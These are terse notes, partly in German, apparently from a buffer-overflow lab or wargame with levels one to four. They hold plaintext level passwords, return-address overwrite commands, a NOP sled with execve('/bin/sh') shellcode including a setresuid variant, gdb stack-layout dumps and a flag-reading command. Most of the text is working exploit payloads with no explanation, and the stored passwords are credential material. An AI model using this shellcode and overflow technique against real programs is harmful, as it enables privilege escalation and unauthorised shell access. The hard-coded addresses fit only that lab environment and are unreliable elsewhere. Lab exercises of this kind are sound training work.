level1userPW: ls2j86gx


level2userPW: n4kagoq2


level3userPW: 7qur207t

level4userPW: g2h34uwz



./level1 $(python -c 'print("AAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCC\xef\xbe\xad\xde")')




good(): 0x00000000080485bb 

\xbb\x85\x04\x08\x00\x00\x00\x00


./level2 $(python -c 'print("A"*48 + "\xbb\x85\x04\x08\x00\x00\x00\x00")')



cat /home/level3/flag


0xffafa8f8




\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80\x31\xc0\x99\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x89\xc2\x31\xc0\xb0\xa4\xcd\x80\x31\xc0\x99\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80


./level3 $(python -c 'print("\x90"*473+"\x31\xc0\x89\xc2\x50\x68
\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80\x31\xc0\x99\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x89\xc2\x31\xc0\xb0\xa4\xcd\x80\x31\xc0\x99\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x48\xd3\xff\xff")')



./level3 $(python -c 'print("\x90"*473+"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80\x31\xc0\x99\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x89\xc2\x31\xc0\xb0\xa4\xcd\x80\x31\xc0\x99\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"\x48\xd4\xff\xff\x00\x00\x00\x00")')




./level3 $(python -c 'print("\x90"*502+"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"+"\x68\xd5\xff\xff\x00\x00\x00\x00")')


Schadcode: 	!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 75B
Basepointer: 	\x88\xd6\xff\xff\x00\x00\x00\x00  | 0xffffd468 4B
AUFRUNDEN  	++++++++++++++++++++++++++++++++++++++++++++++ 8B
userRechte: 	\x5c\xd4\xff\xff\x00\x00\x00\x00  | 0xffffd45c 4B
file: 		\x58\xd4\xff\xff\x00\x00\x00\x00  | 0xffffd458 4B
secretName: 	\x48\xd4\xff\xff\x00\x00\x00\x00  | 0xffffd448 16B
userName: 	\x48\xd2\xff\xff\x00\x00\x00\x00  | 0xffffd248 512B

$1 = (char (*)[16]) 0xffffd448
(gdb) print &userName
$2 = (char (*)[512]) 0xffffd248
(gdb) print &file
$3 = (FILE **) 0xffffd458
(gdb) print &userRechte
$4 = (int *) 0xffffd45c



548 bis return, 473 + 75

Basepointer(main): 	\xbc\xd6\xff\xff\x00\x00\x00\x00  | 0xffffd6bc 4B

Basepointer check_admin 0xffffd688






springe in secretname = 0xffa7cf38



75 instruktionen für shellcode



level3, printf: 0x080484a9
\xa9\x84\x04\x08\x00\x00\x00\x00

bad(): 0x804849b

./level3 $(python -c 'print("A"*548 + "\x9b\x84\x04\x08\x00\x00\x00\x00")')

0xff874618

$(python -c 'print("\x90"*473+"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80\x31\xc0\x99\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x89\xc2\x31\xc0\xb0\xa4\xcd\x80\x31\xc0\x99\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"\x18\x46\x87\xff\x00\x00\x00\x00")') > buffer